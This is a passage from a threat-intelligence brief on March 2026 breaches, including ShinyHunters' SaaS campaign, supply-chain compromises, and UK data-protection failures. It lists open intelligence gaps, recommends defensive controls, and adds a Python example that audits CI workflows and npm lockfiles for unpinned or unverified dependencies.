Companies House holds ISO 27001 and PCI DSS certifications - both of which require access control testing that should have caught a back-button bypass. Lloyds, as the UK's largest retail bank, is subject to FCA operational resilience requirements and PRA supervisory standards.

The incidents raise serious questions about the effectiveness of compliance-driven security in UK financial and government infrastructure.

Information Operations vs Real Operations (Incident 15 vs 08, 17)

The fabricated 375TB APT IRAN Lockheed Martin claim - posted on an untracked marketplace, with zero verified samples after ten days and theatrical pricing of $598.5 million - stands in stark contrast to Handala's verified operations during the same month: a sitting FBI Director's personal emails published with DKIM verification and 28 defense engineers doxxed with genuine passport scans.

Distinguishing signal from noise in the Iranian information operations space is now itself a critical intelligence function.

The fabricated claims consume analyst time, generate media coverage, and provide plausible deniability or amplification for the real operations running in parallel.

━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━

03

INTELLIGENCE GAPS

The following gaps exist in the public record for this threat brief:

2. TeamPCP's claimed compromise of "1,000+ SaaS environments" originates from Mandiant's RSA Conference 2026 presentation and has not been independently verified by a second research firm. The projected 10,000+ figure is an estimate, not a confirmed count.

3. The full scope of the LiteLLM compromise - specifically which organizations installed the malicious PyPI package during the exposure window and whether AI API keys were successfully harvested at scale - has not been publicly quantified.

4. No public attribution has been made for the active exploitation of F5 BIG-IP CVE-2025-53521. The connection to UNC5221's source code theft is circumstantial. Whether the source code exfiltration enabled the RCE exploitation is assessed but unconfirmed.

5. The European Commission has not disclosed whether the March AWS breach and the January MDM breach share any common attack infrastructure, credentials, or threat actor. Whether these are related campaigns or independent targeting remains unknown.

6. NasirSecurity's true operational relationship to MOIS or IRGC has not been established by any Western intelligence agency or security research firm. Resecurity assesses them as "pro-Iranian cyber-mercenaries" but the precise sponsorship model is unclear.

7. The DarkSword iOS exploit kit leaked on GitHub has not been assessed for active exploitation by commodity actors post-leak. Whether the leak has expanded targeting beyond the four originally identified countries is unknown.

8. ShinyHunters' attack vector for the Woflow breach has not been disclosed. AppOmni's assessment of OAuth token abuse is analytical, not forensic.

Whether stolen OAuth2 tokens from the 326GB archive were used to access downstream platforms (Walmart, DoorDash, Uber, Deliveroo) is unknown.

9. The nature of the Intoxalock cyberattack - ransomware, destructive, or data theft - has not been confirmed.

Whether the "vast quantities of information" alleged in the class action (BAC measurements, GPS coordinates, facial photographs, court records) were actually exfiltrated is unconfirmed.

10. Whether any unauthorized user exploited the Companies House WebFiling vulnerability during the 152-day exposure window remains unconfirmed. Log analysis is ongoing. The number of directors whose protected residential addresses were actually accessed is unknown.

11. The full scope of ShinyHunters' March 2026 campaign - whether the five confirmed attacks within this brief (plus Figure) share common infrastructure, stolen credentials, or represent a coordinated operation versus opportunistic targeting - has not been assessed by any research firm.

12. Whether Aura's identity monitoring platform detected its own customers' data appearing on ShinyHunters' leak site - or whether the breach was limited to legacy Circle Media Labs marketing contacts as claimed - has not been independently verified.

13. The Crunchyroll breach attribution remains unresolved.

BleepingComputer was told the attacker is separate from ShinyHunters, and two details support that: Crunchyroll does not appear on ShinyHunters' Tor leak site (while all other March 2026 ShinyHunters victims do), and the "hubert" alias selling the data on BreachForums is not a known ShinyHunters handle. Yet the attack exploited a TELUS agent workstation during ShinyHunters' concurrent TELUS breach, using infostealer TTPs consistent with ShinyHunters' earlier campaigns.

Whether this was a core ShinyHunters operation, a peripheral SLSH ecosystem affiliate, or a fully independent actor exploiting the same compromised TELUS environment has not been determined by any threat intelligence firm.

━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━

04

ZERO|TOLERANCE Advisory

Twenty-nine incidents. Eighteen critical severity. More than twenty countries. ShinyHunters ran at least six confirmed attacks in a single month.

The connective tissue across March 2026 is not the diversity of actors or the sophistication of tooling - it is the repeated exploitation of the same defensive failures, now occurring at a tempo that leaves no margin for delayed response.

ShinyHunters demonstrated that the SaaS supply chain is as dangerous as the software supply chain.

Six confirmed attacks in one month - TELUS, EU Commission, Infinite Campus, Aura, Woflow, and Figure - all exploiting the same playbook: vishing or credential theft to compromise a SaaS platform, then rapid exfiltration.

The Woflow breach is the clearest illustration: one 26-employee vendor breached, four of the world's largest delivery platforms exposed. Walmart, DoorDash, Uber, and Deliveroo did not fail at their own security - they failed at vendor security.

The OAuth tokens in that 326GB archive function as persistent keys to downstream systems.

Iran's MOIS demonstrated it can run espionage, information warfare, and intimidation operations simultaneously across multiple groups and geographic theaters.

The Axios npm hijack proved that a single stolen maintainer token can weaponize a library present in 80% of cloud environments - and it took only 39 minutes to poison both release branches.

TeamPCP demonstrated that a single GitHub Actions misconfiguration can cascade into three major package ecosystems in under a month. VoidStealer demonstrated that browser encryption controls are being outpaced by infostealer innovation cycles.

The F5 BIG-IP reclassification demonstrated that advisory accuracy is itself a systemic risk factor.

And the Intoxalock attack demonstrated that cyber incidents now brick physical devices - court-mandated breathalyzers in 150,000 vehicles across 46 states, stranding people, costing jobs, and shutting off cars mid-drive.

The UK data protection failures at Lloyds and Companies House deserve separate attention. Neither was a cyberattack. A browser back button pressed four times. An API update that broke transaction isolation. Companies House holds ISO 27001 and PCI DSS certifications.

Lloyds is subject to FCA operational resilience requirements. Both exposed data that cannot be changed - National Insurance numbers and statutorily protected residential addresses. Compliance frameworks are not security.

The organizations hit in March 2026 did not fail because they faced novel threats.

They failed because they had not implemented controls that have been available for years: phishing-resistant MFA on privileged accounts, credential monitoring for dark web exposure, immutable tags and hash-pinned dependencies in CI/CD pipelines, management plane isolation on hardened workstations, timely patching of edge devices regardless of vendor severity classification, OAuth token rotation and scope minimization for SaaS integrations, and access control testing that catches a back-button bypass before it persists for 152 days.
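Two of the controls listed above, immutable tags and hash-pinned dependencies in CI/CD pipelines, can be audited mechanically. The following is an added example, not code from the brief or from any of the projects it names: it flags GitHub Actions `uses:` references that are not pinned to a full commit SHA (the kind of mutable reference a stolen token or hijacked tag can redirect) and npm lockfile entries that carry no `integrity` hash. The workflow and lockfile are constructed samples with placeholder SHAs and versions.

```python
import json
import re

# A `uses:` line in a GitHub Actions workflow; the ref after `@` is mutable
# (a tag or branch) unless it is a full 40-hex commit SHA.
USES_RE = re.compile(r"^\s*-?\s*uses:\s*([^\s#@]+)@([^\s#]+)", re.MULTILINE)
SHA_RE = re.compile(r"^[0-9a-f]{40}$")


def find_unpinned_actions(workflow_text: str) -> list[str]:
    """Return 'owner/repo@ref' entries whose ref is not a commit SHA."""
    return [f"{action}@{ref}" for action, ref in USES_RE.findall(workflow_text)
            if not SHA_RE.match(ref)]


def find_unverified_packages(lockfile_text: str) -> list[str]:
    """Return package paths in a package-lock.json (lockfileVersion 2/3) that
    carry no 'integrity' hash, so `npm ci` cannot verify the tarball it installs."""
    lock = json.loads(lockfile_text)
    return [path for path, entry in lock.get("packages", {}).items()
            if path != "" and not entry.get("link") and "integrity" not in entry]


# Constructed sample workflow: one action pinned to a (placeholder) SHA, two to mutable refs.
SAMPLE_WORKFLOW = """\
name: ci
on: [push]
jobs:
  scan:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@0000000000000000000000000000000000000000  # placeholder SHA
      - uses: aquasecurity/trivy-action@master
      - name: setup
        uses: actions/setup-node@v4
"""

# Constructed sample lockfile: placeholder versions; one entry lacks its integrity field.
SAMPLE_LOCKFILE = json.dumps({
    "lockfileVersion": 3,
    "packages": {
        "": {"name": "app"},
        "node_modules/axios": {"version": "0.0.0", "integrity": "sha512-PLACEHOLDER"},
        "node_modules/left-pad": {"version": "0.0.0"},
    },
})

if __name__ == "__main__":
    print("unpinned actions:", find_unpinned_actions(SAMPLE_WORKFLOW))
    print("packages without integrity:", find_unverified_packages(SAMPLE_LOCKFILE))
```

Run it against real `.github/workflows/*.yml` and `package-lock.json` files to get a list of references that should be replaced with commit SHAs and lockfile entries that need regenerating; a clean run means every action resolves to an immutable commit and every npm tarball is hash-verified at install time.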

The management plane is the new perimeter. Your security tooling is your attack surface. Your SaaS vendor is your weakest link. Your vendor's severity rating may be wrong. Your compliance certificate is not proof of security. Act accordingly.
